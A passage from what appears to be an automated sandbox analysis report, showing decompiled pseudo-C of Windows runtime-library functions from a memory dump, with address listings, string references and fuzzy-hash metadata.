                																				__eflags = _t177;
                																				if(_t177 == 0) {
                																					goto L42;
                																				} else {
                																					_t130 = E018CFD9B(_t177, 0, 4);
                																					__eflags = _t130;
                																					if(_t130 != 0) {
                																						goto L42;
                																					} else {
                																						_t68 = _t177 + 0x20;
                																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                																						__eflags =  *_t68;
                																						_t91 =  *(_t177 + 0x20);
                																						goto L74;
                																					}
                																				}
                																			}
                																			goto L35;
                																		} else {
                																			__eflags = _t141;
                																			if(_t141 != 0) {
                																				_t177 = E018CFD22(_t177);
                																				__eflags = _t177;
                																				if(_t177 == 0) {
                																					L42:
                																					_t77 = 0xc0000001;
                																					goto L33;
                																				} else {
                																					_t130 = E018CFD9B(_t177, 0, 4);
                																					__eflags = _t130;
                																					if(_t130 != 0) {
                																						goto L42;
                																					} else {
                																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                																						_t91 =  *(_t177 + 0x20);
                																						goto L26;
                																					}
                																				}
                																				goto L35;
                																			} else {
                																				L26:
                																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                																				__eflags = _t94;
                																				L27:
                																				 *(_t177 + 0x20) = _t94;
                																				__eflags = _t170 & 0x00008000;
                																				if((_t170 & 0x00008000) != 0) {
                																					_t95 = _a12;
                																					__eflags = _t95;
                																					if(_t95 != 0) {
                																						_t96 =  *_t95;
                																						__eflags = _t96;
                																						if(_t96 != 0) {
                																							 *((short*)(_t177 + 0x22)) = 0;
                																							_t40 = _t177 + 0x20;
                																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                																							__eflags =  *_t40;
                																						}
                																					}
                																				}
                																				goto L31;
                																			}
                																		}
                																	}
                																}
                															}
                														}
                													} else {
                														_t147 =  *( *[fs:0x18] + 0xfc0);
                														_t106 =  *(_t147 + 0x20);
                														__eflags = _t106 & 0x00000040;
                														if((_t106 & 0x00000040) != 0) {
                															_t147 = E018CFD22(_t147);
                															__eflags = _t147;
                															if(_t147 == 0) {
                																L41:
                																_t130 = 0xc0000001;
                																L32:
                																_t77 = _t130;
                																goto L33;
                															} else {
                																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                																_t106 =  *(_t147 + 0x20);
                																goto L17;
                															}
                															goto L35;
                														} else {
                															L17:
                															_t108 = _t106 | 0x00000080;
                															__eflags = _t108;
                															 *(_t147 + 0x20) = _t108;
                															 *( *[fs:0x18] + 0xfc0) = _t147;
                															goto L18;
                														}
                													}
                												}
                											}
                											L33:
                										}
                									}
                								}
                							}
                						}
                						L35:
                						return _t77;
                					} else {
                						 *_t75 = 0x1987b80;
                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                						 *_t134 = _t75;
                						 *0x1987b84 = _t75;
                						_t73 = E018AEB70(_t134, 0x1987b60);
                						if( *0x1987b20 != 0) {
                							_t73 =  *( *[fs:0x30] + 0xc);
                							if( *((char*)(_t73 + 0x28)) == 0) {
                								_t73 = E018AFF60( *0x1987b20);
                							}
                						}
                						goto L5;
                					}
                				}
                 			}
                0x0190be3e
                0x0190be29
                0x0190be29
                0x00000000
                0x0190be29
                0x0190be27
                0x00000000
                0x018cfba7
                0x018cfba7
                0x018cfbab
                0x0190bf02
                0x018cfbb1
                0x018cfbb1
                0x018cfbb8
                0x018cfbbd
                0x018cfbbd
                0x018cfbbf
                0x018cfbbf
                0x018cfbc5
                0x018cfbcb
                0x018cfbf8
                0x018cfbf8
                0x018cfbfa
                0x00000000
                0x018cfc00
                0x018cfc00
                0x018cfc03
                0x00000000
                0x018cfc09
                0x018cfc09
                0x018cfc0f
                0x018cfc15
                0x018cfc23
                0x018cfc23
                0x018cfc25
                0x018cfc27
                0x018cfc75
                0x018cfc7c
                0x018cfc84
                0x00000000
                0x018cfc29
                0x018cfc29
                0x018cfc2d
                0x018cfc30
                0x0190bf0f
                0x00000000
                0x018cfc36
                0x018cfc38
                0x018cfc3b
                0x018cfc41
                0x0190bf17
                0x0190bf19
                0x0190bf48
                0x0190bf4b
                0x00000000
                0x0190bf1b
                0x0190bf22
                0x0190bf24
                0x0190bf26
                0x00000000
                0x0190bf2c
                0x0190bf37
                0x0190bf39
                0x0190bf3b
                0x00000000
                0x0190bf41
                0x0190bf41
                0x0190bf41
                0x0190bf41
                0x0190bf45
                0x00000000
                0x0190bf45
                0x0190bf3b
                0x0190bf26
                0x00000000
                0x018cfc47
                0x018cfc47
                0x018cfc49
                0x018cfcb2
                0x018cfcb4
                0x018cfcb6
                0x018cfcdc
                0x018cfcdc
                0x00000000
                0x018cfcb8
                0x018cfcc3
                0x018cfcc5
                0x018cfcc7
                0x00000000
                0x018cfcc9
                0x018cfcc9
                0x018cfccd
                0x00000000
                0x018cfccd
                0x018cfcc7
                0x00000000
                0x018cfc4b
                0x018cfc4b
                0x018cfc4e
                0x018cfc4e
                0x018cfc51
                0x018cfc51
                0x018cfc54
                0x018cfc5a
                0x018cfc5c
                0x018cfc5f
                0x018cfc61
                0x018cfc63
                0x018cfc65
                0x018cfc67
                0x018cfc6e
                0x018cfc72
                0x018cfc72
                0x018cfc72
                0x018cfc72
                0x018cfc67
                0x018cfc61
                0x00000000
                0x018cfc5a
                0x018cfc49
                0x018cfc41
                0x018cfc30
                0x018cfc27
                0x018cfc03
                0x018cfbcd
                0x018cfbd3
                0x018cfbd9
                0x018cfbdc
                0x018cfbde
                0x018cfc99
                0x018cfc9b
                0x018cfc9d
                0x018cfcd5
                0x018cfcd5
                0x018cfc89
                0x018cfc89
                0x00000000
                0x018cfc9f
                0x018cfc9f
                0x018cfca3
                0x00000000
                0x018cfca3
                0x00000000
                0x018cfbe4
                0x018cfbe4
                0x018cfbe4
                0x018cfbe4
                0x018cfbe9
                0x018cfbf2
                0x00000000
                0x018cfbf2
                0x018cfbde
                0x018cfbcb
                0x018cfbab
                0x018cfc8b
                0x018cfc8b
                0x018cfc8c
                0x018cfb80
                0x018cfb72
                0x018cfb5e
                0x018cfc8d
                0x018cfc91
                0x018cfadf
                0x018cfadf
                0x018cfae1
                0x018cfae4
                0x018cfae7
                0x018cfaec
                0x018cfaf8
                0x018cfb00
                0x018cfb07
                0x018cfb0f
                0x018cfb0f
                0x018cfb07
                0x00000000
                0x018cfaf8
                0x018cfadd

                Strings
                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                • API String ID: 0-865735534
                • Opcode ID: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                • Instruction ID: 409cd93add65739b97390d99a51716f2e49fad76829f47b14bc450a1928512df
                • Opcode Fuzzy Hash: 0061991cc3f2b7f38272a0f67fbf9442dd56c61ccdf6a5fdd4bcfc9458d9c0f0
                • Instruction Fuzzy Hash: 95A10575B006168FFB26DB6CC450B7AB7A6AF44B14F04456EEB0ACB681DB34DE01CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E01892D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                				signed char _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				signed int _v52;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t55;
                				signed int _t57;
                				signed int _t58;
                				char* _t62;
                				signed char* _t63;
                				signed char* _t64;
                				signed int _t67;
                				signed int _t72;
                				signed int _t77;
                				signed int _t78;
                				signed int _t88;
                				intOrPtr _t89;
                				signed char _t93;
                				signed int _t97;
                				signed int _t98;
                				signed int _t102;
                				signed int _t103;
                				intOrPtr _t104;
                				signed int _t105;
                				signed int _t106;
                				signed char _t109;
                				signed int _t111;
                				void* _t116;
                
                				_t102 = __edi;
                				_t97 = __edx;
                				_v12 = _v12 & 0x00000000;
                				_t55 =  *[fs:0x18];
                				_t109 = __ecx;
                				_v8 = __edx;
                				_t86 = 0;
                				_v32 = _t55;
                				_v24 = 0;
                				_push(__edi);
                				if(__ecx == 0x1985350) {
                					_t86 = 1;
                					_v24 = 1;
                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                				}
                				_t103 = _t102 | 0xffffffff;
                				if( *0x1987bc8 != 0) {
                					_push(0xc000004b);
                					_push(_t103);
                					E018D97C0();
                				}
                				if( *0x19879c4 != 0) {
                					_t57 = 0;
                				} else {
                					_t57 = 0x19879c8;
                				}
                				_v16 = _t57;
                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                					_t93 = _t109;
                					L23();
                				}
                				_t58 =  *_t109;
                				if(_t58 == _t103) {
                					__eflags =  *(_t109 + 0x14) & 0x01000000;
                					_t58 = _t103;
                					if(__eflags == 0) {
                						_t93 = _t109;
                						E018C1624(_t86, __eflags);
                						_t58 =  *_t109;
                					}
                				}
                				_v20 = _v20 & 0x00000000;
                				if(_t58 != _t103) {
                					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                				}
                				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                				_t88 = _v16;
                				_v28 = _t104;
                				L9:
                				while(1) {
                					if(E018B7D50() != 0) {
                						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                					} else {
                						_t62 = 0x7ffe0382;
                					}
                					if( *_t62 != 0) {
                						_t63 =  *[fs:0x30];
                						__eflags = _t63[0x240] & 0x00000002;
                						if((_t63[0x240] & 0x00000002) != 0) {
                							_t93 = _t109;
                							E0192FE87(_t93);
                						}
                					}
                					if(_t104 != 0xffffffff) {
                						_push(_t88);
                						_push(0);
                						_push(_t104);
                						_t64 = E018D9520();
                						goto L15;
                					} else {
                						while(1) {
                							_t97 =  &_v8;
                							_t64 = E018CE18B(_t109 + 4, _t97, 4, _t88, 0);
                							if(_t64 == 0x102) {
                								break;
                							}
                							_t93 =  *(_t109 + 4);
                							_v8 = _t93;
                							if((_t93 & 0x00000002) != 0) {
                								continue;
                							}
                							L15:
                							if(_t64 == 0x102) {
                								break;
                							}
                							_t89 = _v24;
                							if(_t64 < 0) {
                								L018EDF30(_t93, _t97, _t64);
                								_push(_t93);
                								_t98 = _t97 | 0xffffffff;
                								__eflags =  *0x1986901;
                								_push(_t109);
                								_v52 = _t98;
                								if( *0x1986901 != 0) {
                									_push(0);
                									_push(1);
                									_push(0);
                									_push(0x100003);
                									_push( &_v12);
                									_t72 = E018D9980();
                									__eflags = _t72;
                									if(_t72 < 0) {
                										_v12 = _t98 | 0xffffffff;
                									}
                								}
                								asm("lock cmpxchg [ecx], edx");
                								_t111 = 0;
                								__eflags = 0;
                								if(0 != 0) {
                									__eflags = _v12 - 0xffffffff;
                									if(_v12 != 0xffffffff) {
                										_push(_v12);
                										E018D95D0();
                									}
                								} else {
                									_t111 = _v12;
                								}
                								return _t111;
                							} else {
                								if(_t89 != 0) {
                									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                									_t77 = E018B7D50();
                									__eflags = _t77;
                									if(_t77 == 0) {
                										_t64 = 0x7ffe0384;
                									} else {
                										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                									}
                									__eflags =  *_t64;
                									if( *_t64 != 0) {
                										_t64 =  *[fs:0x30];
                										__eflags = _t64[0x240] & 0x00000004;
                										if((_t64[0x240] & 0x00000004) != 0) {
                											_t78 = E018B7D50();
                											__eflags = _t78;
                											if(_t78 == 0) {
                												_t64 = 0x7ffe0385;
                											} else {
                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                											}
                											__eflags =  *_t64 & 0x00000020;
                											if(( *_t64 & 0x00000020) != 0) {
                												_t64 = E01917016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                											}
                										}
                									}
                								}
                								return _t64;
                							}
                						}
                						_t97 = _t88;
                						_t93 = _t109;
                						E0192FDDA(_t97, _v12);
                						_t105 =  *_t109;
                						_t67 = _v12 + 1;
                						_v12 = _t67;
                						__eflags = _t105 - 0xffffffff;
                						if(_t105 == 0xffffffff) {
                							_t106 = 0;
                							__eflags = 0;
                						} else {
                							_t106 =  *(_t105 + 0x14);
                						}
                						__eflags = _t67 - 2;
                						if(_t67 > 2) {
                							__eflags = _t109 - 0x1985350;
                							if(_t109 != 0x1985350) {
                								__eflags = _t106 - _v20;
                								if(__eflags == 0) {
                									_t93 = _t109;
                									E0192FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                								}
                							}
                						}
                						_push("RTL: Re-Waiting\n");
                						_push(0);
                						_push(0x65);
                						_v20 = _t106;
                						E01925720();
                						_t104 = _v28;
                						_t116 = _t116 + 0xc;
                						continue;
                					}
                				}
                			}

                0x01892d8a
                0x01892d8a
                0x01892d92
                0x01892d96
                0x01892d9e
                0x01892da0
                0x01892da3
                0x01892da5
                0x01892da8
                0x01892dab
                0x01892db2
                0x018ef9aa
                0x018ef9ab
                0x018ef9ae
                0x018ef9ae
                0x01892db8
                0x01892dc2
                0x018ef9b9
                0x018ef9be
                0x018ef9bf
                0x018ef9bf
                0x01892dcf
                0x018ef9c9
                0x01892dd5
                0x01892dd5
                0x01892dd5
                0x01892dde
                0x01892de1
                0x01892e70
                0x01892e72
                0x01892e72
                0x01892de7
                0x01892deb
                0x01892e7c
                0x01892e83
                0x01892e85
                0x01892e8b
                0x01892e8d
                0x01892e92
                0x01892e92
                0x01892e85
                0x01892df1
                0x01892df7
                0x01892df9
                0x01892df9
                0x01892dfc
                0x01892dff
                0x01892e02
                0x00000000
                0x01892e05
                0x01892e0c
                0x018ef9d9
                0x01892e12
                0x01892e12
                0x01892e12
                0x01892e1a
                0x018ef9e3
                0x018ef9e9
                0x018ef9f0
                0x018ef9f6
                0x018ef9f8
                0x018ef9f8
                0x018ef9f0
                0x01892e23
                0x018efa02
                0x018efa03
                0x018efa05
                0x018efa06
                0x00000000
                0x01892e29
                0x01892e29
                0x01892e2e
                0x01892e34
                0x01892e3e
                0x00000000
                0x00000000
                0x01892e44
                0x01892e47
                0x01892e4d
                0x00000000
                0x00000000
                0x01892e4f
                0x01892e54
                0x00000000
                0x00000000
                0x01892e5a
                0x01892e5f
                0x01892e9a
                0x01892ea4
                0x01892ea5
                0x01892ea8
                0x01892eaf
                0x01892eb2
                0x01892eb5
                0x018efae9
                0x018efaeb
                0x018efaed
                0x018efaef
                0x018efaf7
                0x018efaf8
                0x018efafd
                0x018efaff
                0x018efb04
                0x018efb04
                0x018efaff
                0x01892ec0
                0x01892ec4
                0x01892ec6
                0x01892ec8
                0x018efb14
                0x018efb18
                0x018efb1e
                0x018efb21
                0x018efb21
                0x01892ece
                0x01892ece
                0x01892ece
                0x01892ed7
                0x01892e61
                0x01892e63
                0x018efa6b
                0x018efa71
                0x018efa76
                0x018efa78
                0x018efa8a
                0x018efa7a
                0x018efa83
                0x018efa83
                0x018efa8f
                0x018efa91
                0x018efa97
                0x018efa9d
                0x018efaa4
                0x018efaaa
                0x018efaaf
                0x018efab1
                0x018efac3
                0x018efab3
                0x018efabc
                0x018efabc
                0x018efac8
                0x018efacb
                0x018efadf
                0x018efadf
                0x018efacb
                0x018efaa4
                0x018efa91
                0x01892e6f
                0x01892e6f
                0x01892e5f
                0x018efa13
                0x018efa15
                0x018efa17
                0x018efa1f
                0x018efa21
                0x018efa22
                0x018efa25
                0x018efa28
                0x018efa2f
                0x018efa2f
                0x018efa2a
                0x018efa2a
                0x018efa2a
                0x018efa31
                0x018efa34
                0x018efa36
                0x018efa3c
                0x018efa3e
                0x018efa41
                0x018efa43
                0x018efa45
                0x018efa45
                0x018efa41
                0x018efa3c
                0x018efa4a
                0x018efa4f
                0x018efa51
                0x018efa53
                0x018efa56
                0x018efa5b
                0x018efa5e
                0x00000000
                0x018efa5e
                0x01892e23

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: RTL: Re-Waiting
                • API String ID: 0-316354757
                • Opcode ID: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                • Instruction ID: 0ff1b130eab411ce3d4b9e3af4227e81f1072e0ed47c1b9616c6a145b49951f7
                • Opcode Fuzzy Hash: 084f5969fb3352ce5c9e5d44cbd36878947657ebf17576adfe910f5ce735c254
                • Instruction Fuzzy Hash: 01610671A00649AFEB32DF6CC888B7E7BE6EB45718F180659E615DB2C2C7349B008781
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E01960EA5(void* __ecx, void* __edx) {
                				signed int _v20;
                				char _v24;
                				intOrPtr _v28;
                				unsigned int _v32;
                				signed int _v36;
                				intOrPtr _v40;
                				char _v44;
                				intOrPtr _v64;
                				void* __ebx;
                				void* __edi;
                				signed int _t58;
                				unsigned int _t60;
                				intOrPtr _t62;
                				char* _t67;
                				char* _t69;
                				void* _t80;
                				void* _t83;
                				intOrPtr _t93;
                				intOrPtr _t115;
                				char _t117;
                				void* _t120;
                
                				_t83 = __edx;
                				_t117 = 0;
                				_t120 = __ecx;
                				_v44 = 0;
                				if(E0195FF69(__ecx,  &_v44,  &_v32) < 0) {
                					L24:
                					_t109 = _v44;
                					if(_v44 != 0) {
                						E01961074(_t83, _t120, _t109, _t117, _t117);
                					}
                					L26:
                					return _t117;
                				}
                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                				_t5 = _t83 + 1; // 0x1
                				_v36 = _t5 << 0xc;
                				_v40 = _t93;
                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                				asm("sbb ebx, ebx");
                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                				if(_t58 != 0) {
                					_push(0);
                					_push(0x14);
                					_push( &_v24);
                					_push(3);
                					_push(_t93);
                					_push(0xffffffff);
                					_t80 = E018D9730();
                					_t115 = _v64;
                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                						_push(_t93);
                						E0195A80D(_t115, 1, _v20, _t117);
                						_t83 = 4;
                					}
                				}
                				if(E0195A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                					goto L24;
                				}
                				_t60 = _v32;
                				_t97 = (_t60 != 0x100000) + 1;
                				_t83 = (_v44 -  *0x1988b04 >> 0x14) + (_v44 -  *0x1988b04 >> 0x14);
                				_v28 = (_t60 != 0x100000) + 1;
                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                				_v40 = _t62;
                				if(_t83 >= _t62) {
                					L10:
                					asm("lock xadd [eax], ecx");
                					asm("lock xadd [eax], ecx");
                					if(E018B7D50() == 0) {
                						_t67 = 0x7ffe0380;
                					} else {
                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                					}
                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                						E0195138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                					}
                					if(E018B7D50() == 0) {
                						_t69 = 0x7ffe0388;
                					} else {
                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                					}
                					if( *_t69 != 0) {
                						E0194FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                					}
                					if(( *0x1988724 & 0x00000008) != 0) {
                						E019552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                					}
                					_t117 = _v44;
                					goto L26;
                				}
                				while(E019615B5(0x1988ae4, _t83, _t97, _t97) >= 0) {
                					_t97 = _v28;
                					_t83 = _t83 + 2;
                					if(_t83 < _v40) {
                						continue;
                					}
                					goto L10;
                				}
                				goto L24;
                			}

                0x01960eb7
                0x01960eb9
                0x01960ec0
                0x01960ec2
                0x01960ecd
                0x0196105b
                0x0196105b
                0x01961061
                0x01961066
                0x01961066
                0x0196106b
                0x01961073
                0x01961073
                0x01960ed3
                0x01960ed6
                0x01960edc
                0x01960ee0
                0x01960ee7
                0x01960ef0
                0x01960ef5
                0x01960efa
                0x01960efc
                0x01960efd
                0x01960f03
                0x01960f04
                0x01960f06
                0x01960f07
                0x01960f09
                0x01960f0e
                0x01960f14
                0x01960f23
                0x01960f2d
                0x01960f34
                0x01960f34
                0x01960f14
                0x01960f52
                0x00000000
                0x00000000
                0x01960f58
                0x01960f73
                0x01960f74
                0x01960f79
                0x01960f7d
                0x01960f80
                0x01960f86
                0x01960fab
                0x01960fb5
                0x01960fc6
                0x01960fd1
                0x01960fe3
                0x01960fd3
                0x01960fdc
                0x01960fdc
                0x01960feb
                0x01961009
                0x01961009
                0x01961015
                0x01961027
                0x01961017
                0x01961020
                0x01961020
                0x0196102f
                0x0196103c
                0x0196103c
                0x01961048
                0x01961050
                0x01961050
                0x01961055
                0x00000000
                0x01961055
                0x01960f88
                0x01960f9e
                0x01960fa2
                0x01960fa9
                0x00000000
                0x00000000
                0x00000000
                0x01960fa9
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: `
                • API String ID: 0-2679148245
                • Opcode ID: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                • Instruction ID: 6091ea35545fdb4a94084e44e8140e8ecd5856ea3192f874c8c17f67712c6137
                • Opcode Fuzzy Hash: df5db7caa70c67db9aeb84ea559ca783dd393437114461ecfb38f733e67b76fe
                • Instruction Fuzzy Hash: B851AE713043829FE725DF28D980B1BBBE9EBC4714F08492CFA9A97290D770E805C762
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E018CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char* _v20;
                				intOrPtr _v24;
                				char _v28;
                				intOrPtr _v32;
                				char _v36;
                				char _v44;
                				char _v52;
                				intOrPtr _v56;
                				char _v60;
                				intOrPtr _v72;
                				void* _t51;
                				void* _t58;
                				signed short _t82;
                				short _t84;
                				signed int _t91;
                				signed int _t100;
                				signed short* _t103;
                				void* _t108;
                				intOrPtr* _t109;
                
                				_t103 = __ecx;
                				_t82 = __edx;
                				_t51 = E018B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                				if(_t51 >= 0) {
                					_push(0x21);
                					_push(3);
                					_v56 =  *0x7ffe02dc;
                					_v20 =  &_v52;
                					_push( &_v44);
                					_v28 = 0x18;
                					_push( &_v28);
                					_push(0x100020);
                					_v24 = 0;
                					_push( &_v60);
                					_v16 = 0x40;
                					_v12 = 0;
                					_v8 = 0;
                					_t58 = E018D9830();
                					_t87 =  *[fs:0x30];
                					_t108 = _t58;
                					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                					if(_t108 < 0) {
                						L11:
                						_t51 = _t108;
                					} else {
                						_push(4);
                						_push(8);
                						_push( &_v36);
                						_push( &_v44);
                						_push(_v60);
                						_t108 = E018D9990();
                						if(_t108 < 0) {
                							L10:
                							_push(_v60);
                							E018D95D0();
                							goto L11;
                						} else {
                							_t109 = L018B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                							if(_t109 == 0) {
                								_t108 = 0xc0000017;
                								goto L10;
                							} else {
                								_t21 = _t109 + 0x18; // 0x18
                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                								 *_t109 = 1;
                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                								 *(_t109 + 0xe) = _t82;
                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                								E018DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                								 *((short*)(_t109 + 0xc)) =  *_t103;
                								_t91 =  *_t103 & 0x0000ffff;
                								_t100 = _t91 & 0xfffffffe;
                								_t84 = 0x5c;
                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                										_push(_v60);
                										E018D95D0();
                										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                										_t51 = 0xc0000106;
                									} else {
                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                										goto L5;
                									}
                								} else {
                									L5:
                									 *_a4 = _t109;
                									_t51 = 0;
                								}
                							}
                						}
                					}
                				}
                				return _t51;
                			}
                Addresses (per-line address column, flattened): 0x018cf0d3-0x018cf22b, with out-of-line blocks at 0x0190baa2-0x0190bad1

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction ID: 5aa882849b252696784207e0e6f3c5e54acb1e63a6930c5ea86d123a1466bfe6
                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                • Instruction Fuzzy Hash: 66517B715007159FD321DF18C840A6BBBF9BF88710F00492EFA96C7690E774E944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E01913540(intOrPtr _a4) {
                				signed int _v12;
                				intOrPtr _v88;
                				intOrPtr _v92;
                				char _v96;
                				char _v352;
                				char _v1072;
                				intOrPtr _v1140;
                				intOrPtr _v1148;
                				char _v1152;
                				char _v1156;
                				char _v1160;
                				char _v1164;
                				char _v1168;
                				char* _v1172;
                				short _v1174;
                				char _v1176;
                				char _v1180;
                				char _v1192;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				short _t41;
                				short _t42;
                				intOrPtr _t80;
                				intOrPtr _t81;
                				signed int _t82;
                				void* _t83;
                
                				_v12 =  *0x198d360 ^ _t82;
                				_t41 = 0x14;
                				_v1176 = _t41;
                				_t42 = 0x16;
                				_v1174 = _t42;
                				_v1164 = 0x100;
                				_v1172 = L"BinaryHash";
                				_t81 = E018D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                				if(_t81 < 0) {
                					L11:
                					_t75 = _t81;
                					E01913706(0, _t81, _t79, _t80);
                					L12:
                					if(_a4 != 0xc000047f) {
                						E018DFA60( &_v1152, 0, 0x50);
                						_v1152 = 0x60c201e;
                						_v1148 = 1;
                						_v1140 = E01913540;
                						E018DFA60( &_v1072, 0, 0x2cc);
                						_push( &_v1072);
                						E018EDDD0( &_v1072, _t75, _t79, _t80, _t81);
                						E01920C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                						_push(_v1152);
                						_push(0xffffffff);
                						E018D97C0();
                					}
                					return E018DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                				}
                				_t79 =  &_v352;
                				_t81 = E01913971(0, _a4,  &_v352,  &_v1156);
                				if(_t81 < 0) {
                					goto L11;
                				}
                				_t75 = _v1156;
                				_t79 =  &_v1160;
                				_t81 = E01913884(_v1156,  &_v1160,  &_v1168);
                				if(_t81 >= 0) {
                					_t80 = _v1160;
                					E018DFA60( &_v96, 0, 0x50);
                					_t83 = _t83 + 0xc;
                					_push( &_v1180);
                					_push(0x50);
                					_push( &_v96);
                					_push(2);
                					_push( &_v1176);
                					_push(_v1156);
                					_t81 = E018D9650();
                					if(_t81 >= 0) {
                						if(_v92 != 3 || _v88 == 0) {
                							_t81 = 0xc000090b;
                						}
                						if(_t81 >= 0) {
                							_t75 = _a4;
                							_t79 =  &_v352;
                							E01913787(_a4,  &_v352, _t80);
                						}
                					}
                					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                				}
                				_push(_v1156);
                				E018D95D0();
                				if(_t81 >= 0) {
                					goto L12;
                				} else {
                					goto L11;
                				}
                			}
                Addresses (per-line address column, flattened): 0x01913552-0x01913703

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                • Instruction ID: aa6f18ccc8101631416b7888732731e531c8ac971850e3267508d2e71950ad28
                • Opcode Fuzzy Hash: 81aea42c6b4a58548f2176ea7dc0aa0aaa43932d66ce83c4fed2e6f1e7713eb8
                • Instruction Fuzzy Hash: 4C4133B1D0062D9BDB21DA54CC85F9EB77CAB44768F0045A5EA0DAB240DB309F888F95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E019605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v20;
                				char _v24;
                				signed int _v28;
                				char _v32;
                				signed int _v36;
